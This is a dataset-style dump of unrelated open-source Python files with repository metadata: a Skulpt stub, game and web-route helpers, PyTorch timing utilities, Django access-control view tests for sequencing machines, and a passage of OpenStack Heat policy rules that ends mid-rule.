] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | src/lib/sre_compile.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | src/lib/sre_compile.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import _sk_fail; _sk_fail._("sre_compile")
| 21.5 | 42 | 0.790698 | 7 | 43 | 4 | 0.714286 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0380a906483de0d0bd7facd4ba3ee4af9934c511 | 95 | py | Python | games/pyxel-games-master/WhatAmI/utils.py | rkrishnasanka/Pyxel-Paradise-Launcher | 16727098bbc7acfbb26d34331505a18da60a2649 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T03:06:32.000Z | 2020-02-04T03:06:32.000Z | games/pyxel-games-master/WhatAmI/utils.py | rkrishnasanka/Pyxel-Paradise-Launcher | 16727098bbc7acfbb26d34331505a18da60a2649 | [
"BSD-3-Clause"
] | null | null | null | games/pyxel-games-master/WhatAmI/utils.py | rkrishnasanka/Pyxel-Paradise-Launcher | 16727098bbc7acfbb26d34331505a18da60a2649 | [
"BSD-3-Clause"
] | null | null | null | import math
def get_tile_from_pos(x, y):
return (math.floor(y / 8), math.floor(x / 8)) | 23.75 | 53 | 0.631579 | 18 | 95 | 3.166667 | 0.666667 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026667 | 0.210526 | 95 | 4 | 53 | 23.75 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
0392c01c80c751ff0aa087ae1f36628c1d84b242 | 202 | py | Python | kirby/builtins/available_plugins/routes.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | 5 | 2019-01-31T19:47:52.000Z | 2019-03-06T09:44:47.000Z | kirby/builtins/available_plugins/routes.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | kirby/builtins/available_plugins/routes.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | import json
from kirby.core import web_api
from .controller import get_all_available_plugins
@web_api.route('/')
def get_available_plugins_route():
return json.dumps(get_all_available_plugins())
| 20.2 | 50 | 0.806931 | 30 | 202 | 5.066667 | 0.533333 | 0.315789 | 0.197368 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108911 | 202 | 9 | 51 | 22.444444 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0.004951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.5 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
03ee7db85a1eb441860e09d31b2166b08f149537 | 2,230 | py | Python | pytorch_toolbox/probe/runtime.py | MathGaron/pytorch_toolbox | 2afd13e50ba71dfce66467a4b070d9b922668502 | [
"MIT"
] | 10 | 2018-02-26T04:51:11.000Z | 2021-10-01T02:30:37.000Z | pytorch_toolbox/probe/runtime.py | MathGaron/pytorch_toolbox | 2afd13e50ba71dfce66467a4b070d9b922668502 | [
"MIT"
] | 9 | 2017-11-16T16:11:16.000Z | 2020-02-13T13:10:55.000Z | pytorch_toolbox/probe/runtime.py | MathGaron/pytorch_toolbox | 2afd13e50ba71dfce66467a4b070d9b922668502 | [
"MIT"
] | 7 | 2018-02-12T19:06:14.000Z | 2021-03-25T19:13:51.000Z | import torch
from torch.autograd import Variable
import time
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
def compute_test_time(network_class, input_size, max_batch_size, step_size=1, is_cuda=False):
backend = "cpu"
if is_cuda:
backend = "cuda"
model = network_class()
if is_cuda:
model = model.cuda()
model.eval()
time_log = []
    # make sure that everything is in memory before the actual tests
batch = Variable(torch.FloatTensor(1, *input_size))
if is_cuda:
batch = batch.cuda()
model(batch)
print("Compute {} test time".format(backend))
for i in tqdm(range(0, max_batch_size, step_size)):
batch = Variable(torch.FloatTensor(i+1, *input_size))
if is_cuda:
batch = batch.cuda()
time_start = time.time()
model(batch)
time_log.append(time.time() - time_start)
plt.plot(np.arange(1, max_batch_size + 1, step_size), time_log)
plt.title("{} test time w.r.t minibatch size".format(backend))
plt.ylabel("Time (s)")
plt.xlabel("Batch size")
def compute_train_time(network_class, input_size, max_batch_size, step_size=1, is_cuda=False, backward_only=False):
backend = "cpu"
if is_cuda:
backend = "cuda"
model = network_class()
if is_cuda:
model = model.cuda()
model.train()
time_log = []
    # make sure that everything is in memory before the actual tests
batch = Variable(torch.FloatTensor(1, *input_size))
if is_cuda:
batch = batch.cuda()
model(batch)
print("Compute {} test time".format(backend))
for i in tqdm(range(0, max_batch_size, step_size)):
batch = Variable(torch.FloatTensor(i+1, *input_size))
if is_cuda:
batch = batch.cuda()
time_start = time.time()
prediction = model(batch)
out = torch.sum(prediction)
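        # when timing only the backward pass, restart the clock after the forward pass has finished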
if backward_only:
time_start = time.time()
out.backward()
time_log.append(time.time() - time_start)
plt.plot(np.arange(1, max_batch_size + 1, step_size), time_log)
plt.title("{} train time w.r.t minibatch size".format(backend))
plt.ylabel("Time (s)")
plt.xlabel("Batch size") | 31.857143 | 115 | 0.643049 | 315 | 2,230 | 4.377778 | 0.212698 | 0.04351 | 0.04641 | 0.04641 | 0.808557 | 0.808557 | 0.808557 | 0.808557 | 0.808557 | 0.808557 | 0 | 0.007071 | 0.239013 | 2,230 | 70 | 116 | 31.857143 | 0.805539 | 0.055157 | 0 | 0.733333 | 0 | 0 | 0.074584 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.1 | 0 | 0.133333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
03fe732f4d809199493b38ad904ff9d1e867457e | 14,498 | py | Python | sequencers/tests/test_views.py | bihealth/digestiflow-server | 298c53f95dbf56e7be0d0b8bcceacabc21257d5f | [
"MIT"
] | 13 | 2019-11-27T19:12:15.000Z | 2021-12-01T21:32:18.000Z | sequencers/tests/test_views.py | bihealth/digestiflow-server | 298c53f95dbf56e7be0d0b8bcceacabc21257d5f | [
"MIT"
] | 60 | 2019-03-27T14:43:19.000Z | 2022-03-22T09:12:53.000Z | sequencers/tests/test_views.py | bihealth/digestiflow-server | 298c53f95dbf56e7be0d0b8bcceacabc21257d5f | [
"MIT"
] | 3 | 2020-11-09T07:08:42.000Z | 2022-02-09T11:37:54.000Z | # TODO: check timeline events
from django.shortcuts import reverse
from test_plus.test import TestCase
from digestiflow.test_utils import SetupUserMixin, SetupProjectMixin, AuthenticatedRequestMixin
from ..models import INDEX_WORKFLOW_A, MACHINE_MODEL_HISEQ2000, SequencingMachine
from ..tests import SetupSequencingMachineMixin
class SequencingMachineListViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineListView``"""
def runGet(self, user, project=None):
return super().runGet(
user, "sequencers:sequencer-list", project=(project or self.project).sodar_uuid
)
def testGet(self):
"""Test that rendering the machine list works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.norole, None, self.unrelated_owner):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
def testAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.guest, self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object_list")
class SequencingMachineDetailViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineDetailView``"""
def runGet(self, user, project=None):
return super().runGet(
user,
"sequencers:sequencer-detail",
project=(project or self.project).sodar_uuid,
sequencer=self.hiseq2000.sodar_uuid,
)
def testGet(self):
"""Test that rendering the machine detail works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.guest, self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
def testGetAccessDenied(self):
"""Test that access is allowed if role assignment is missing"""
for user in (self.norole, None):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runGet(self.unrelated_owner, self.unrelated_project)
self.response_404()
class SequencingMachineCreateViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineCreateView``"""
url_name = "sequencers:sequencer-create"
def setUp(self):
super().setUp()
self.form_data = {
"vendor_id": "Hzzzzzzzz",
"label": "Another test machine",
"machine_model": MACHINE_MODEL_HISEQ2000,
"slot_count": 2,
"dual_index_workflow": INDEX_WORKFLOW_A,
}
def runGet(self, user, project=None):
return super().runGet(user, self.url_name, project=(project or self.project).sodar_uuid)
def runPost(self, user, data, project=None):
return super().runPost(
user, self.url_name, project=(project or self.project).sodar_uuid, data=data
)
def testGet(self):
"""Test that rendering the machine create form works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("form")
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.guest, self.norole, None):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("form")
def testPost(self):
"""Test that the create view works (with super user)"""
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(self.root, self.form_data)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
self.assertEqual(SequencingMachine.objects.count(), 2)
def testPostAccessDenied(self):
"""Test that access is denied if necessary role assignment is missing"""
for user in (self.norole, self.guest, None, self.unrelated_owner):
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, data=self.form_data)
self.assertUnauthorizedRedirect(user, response)
def testPostAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
SequencingMachine.objects.all().delete()
response = self.runPost(user, data=self.form_data)
self.assertEqual(SequencingMachine.objects.count(), 1)
self.response_200(response)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
class SequencingMachineUpdateViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineUpdateView``"""
url_name = "sequencers:sequencer-update"
def setUp(self):
super().setUp()
self.form_data = {
"vendor_id": "Haaaaaaaa",
"label": "UPDATED",
"machine_model": MACHINE_MODEL_HISEQ2000,
"slot_count": 2,
"dual_index_workflow": INDEX_WORKFLOW_A,
}
def runGet(self, user, project=None):
return super().runGet(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=self.hiseq2000.sodar_uuid,
)
def runPost(self, user, data, project=None):
return super().runPost(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=self.hiseq2000.sodar_uuid,
data=data,
)
def testGet(self):
"""Test that rendering the machine update form works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
self.assertInContext("form")
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.guest, self.norole, None):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runGet(self.unrelated_owner, self.unrelated_project)
self.response_404()
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
self.assertInContext("form")
def testPost(self):
"""Test that the update view works (with super user)"""
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(self.root, self.form_data)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
self.assertEqual(SequencingMachine.objects.count(), 1)
instrument = SequencingMachine.objects.first()
self.assertEqual(instrument.vendor_id, self.form_data["vendor_id"])
self.assertEqual(instrument.label, self.form_data["label"])
def testPostAccessDenied(self):
"""Test that access is denied if necessary role assignment is missing"""
for user in (self.norole, self.guest, None):
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, data=self.form_data)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runPost(self.unrelated_owner, data=self.form_data, project=self.unrelated_project)
self.response_404()
def testPostAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runPost(user, data=self.form_data)
self.assertEqual(SequencingMachine.objects.count(), 1)
self.response_200(response)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
class SequencingMachineDeleteViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineDeleteView``"""
url_name = "sequencers:sequencer-delete"
def setUp(self):
super().setUp()
def runGet(self, user, sequencer, project=None):
return super().runGet(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=sequencer.sodar_uuid,
)
def runPost(self, user, sequencer, project=None):
return super().runPost(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=sequencer.sodar_uuid,
)
def testGet(self):
"""Test that rendering the machine update form works (with super user)"""
response = self.runGet(self.root, self.hiseq2000)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.guest, self.norole, None):
response = self.runGet(user, self.hiseq2000)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runGet(self.unrelated_owner, sequencer=self.hiseq2000, project=self.unrelated_project)
self.response_404()
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user, self.hiseq2000)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
def testPost(self):
"""Test that the delete view works (with super user)"""
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(self.root, SequencingMachine.objects.first())
self.assertEqual(SequencingMachine.objects.count(), 0)
self.response_200(response)
self.assertRedirects(
response,
reverse("sequencers:sequencer-list", kwargs={"project": self.project.sodar_uuid}),
fetch_redirect_response=False,
)
def testPostAccessDenied(self):
"""Test that access is denied if necessary role assignment is missing"""
for user in (self.norole, self.guest, None):
SequencingMachine.objects.all().delete()
self.make_machine()
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, SequencingMachine.objects.first())
self.assertEqual(SequencingMachine.objects.count(), 1)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
SequencingMachine.objects.all().delete()
self.make_machine()
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(
self.unrelated_owner,
sequencer=SequencingMachine.objects.first(),
project=self.unrelated_project,
)
self.assertEqual(SequencingMachine.objects.count(), 1)
self.response_404(response)
def testPostAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
SequencingMachine.objects.all().delete()
self.make_machine()
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, SequencingMachine.objects.first())
self.assertEqual(SequencingMachine.objects.count(), 0)
self.response_200(response)
self.assertRedirects(
response,
reverse("sequencers:sequencer-list", kwargs={"project": self.project.sodar_uuid}),
fetch_redirect_response=False,
)
| 39.289973 | 99 | 0.648641 | 1,502 | 14,498 | 6.178429 | 0.092543 | 0.047845 | 0.031034 | 0.031034 | 0.894935 | 0.878556 | 0.875216 | 0.817672 | 0.803341 | 0.798384 | 0 | 0.010585 | 0.250655 | 14,498 | 368 | 100 | 39.396739 | 0.843612 | 0.144227 | 0 | 0.798587 | 0 | 0 | 0.043489 | 0.014931 | 0 | 0 | 0 | 0.002717 | 0.176678 | 1 | 0.123675 | false | 0 | 0.017668 | 0.028269 | 0.19788 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
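The view tests above call request helpers (runGet, runPost, assertUnauthorizedRedirect) and setup mixins that are defined elsewhere in the repository and are not visible here. Purely for orientation, a minimal sketch of what such a request mixin could look like follows, assuming Django's test client; the helper names are taken from the tests above, while the bodies are illustrative and may differ from the project's actual AuthenticatedRequestMixin.

from django.urls import reverse


class AuthenticatedRequestMixin:
    """Sketch of the request helpers used by the view tests above (illustrative only)."""

    def runGet(self, user, url_name, **url_kwargs):
        # Authenticate as ``user`` (or stay anonymous when ``user`` is None), then GET the named URL.
        if user:
            self.client.force_login(user)
        else:
            self.client.logout()
        return self.client.get(reverse(url_name, kwargs=url_kwargs))

    def runPost(self, user, url_name, data=None, **url_kwargs):
        # Same as runGet, but issues a POST with the given form data.
        if user:
            self.client.force_login(user)
        else:
            self.client.logout()
        return self.client.post(reverse(url_name, kwargs=url_kwargs), data=data or {})

    def assertUnauthorizedRedirect(self, user, response):
        # Users without the required role (and anonymous users) are redirected rather than served the page.
        self.assertEqual(response.status_code, 302)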
ff1711e6c129402e09892db6af6aed09d07bf428 | 39,893 | py | Python | skyline_apiserver/policy/manager/heat.py | openstack/skyline-apiserver | 60144767cd5513bd581fbb8eac7791887d5b276f | [
"Apache-2.0"
] | null | null | null | skyline_apiserver/policy/manager/heat.py | openstack/skyline-apiserver | 60144767cd5513bd581fbb8eac7791887d5b276f | [
"Apache-2.0"
] | null | null | null | skyline_apiserver/policy/manager/heat.py | openstack/skyline-apiserver | 60144767cd5513bd581fbb8eac7791887d5b276f | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
from . import base
list_rules = (
base.Rule(
name="context_is_admin",
check_str=("(role:admin and is_admin_project:True) OR (role:admin and system_scope:all)"),
description="Decides what is required for the 'is_admin:True' check to succeed.",
),
base.Rule(
name="project_admin",
check_str=("role:admin"),
description="Default rule for project admin.",
),
base.Rule(
name="deny_stack_user",
check_str=("not role:heat_stack_user"),
description="Default rule for deny stack user.",
),
base.Rule(
name="deny_everybody",
check_str=("!"),
description="Default rule for deny everybody.",
),
base.Rule(
name="allow_everybody",
check_str=(""),
description="Default rule for allow everybody.",
),
base.Rule(
name="cloudformation:ListStacks",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:CreateStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStacks",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DeleteStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:UpdateStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:CancelUpdateStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStackEvents",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:ValidateTemplate",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:GetTemplate",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:EstimateTemplateCost",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStackResource",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStackResources",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:ListStackResources",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="resource_types:OS::Nova::Flavor",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::EncryptedVolumeType",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::VolumeType",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Nova::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Octavia::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Manila::ShareType",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::ProviderNet",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSPolicy",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSBandwidthLimitRule",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSDscpMarkingRule",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSMinimumBandwidthRule",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::Segment",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Nova::HostAggregate",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::QoSSpecs",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::QoSAssociation",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Keystone::*",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Blazar::Host",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Octavia::Flavor",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Octavia::FlavorProfile",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="service:index",
check_str=("role:reader and system_scope:all"),
description="No description",
),
base.APIRule(
name="actions:action",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Performs non-lifecycle operations on the stack (Snapshot, Resume, Cancel update, or check stack resources). This is the default for all actions but can be overridden by more specific policies for individual actions.",
scope_types=["project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create stack snapshot",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:suspend",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Suspend a stack.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:resume",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Resume a suspended stack.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:check",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Check stack resources.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:cancel_update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Cancel stack operation and roll back.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:cancel_without_rollback",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Cancel stack operation without rolling back.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="build_info:build_info",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Show build information.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/build_info"}],
),
base.APIRule(
name="events:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List events.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/events"},
],
),
base.APIRule(
name="events:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show event.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}/events/{event_id}",
},
],
),
base.APIRule(
name="resource:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List resources.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources"},
],
),
base.APIRule(
name="resource:metadata",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s or role:heat_stack_user"
),
description="Show resource metadata.",
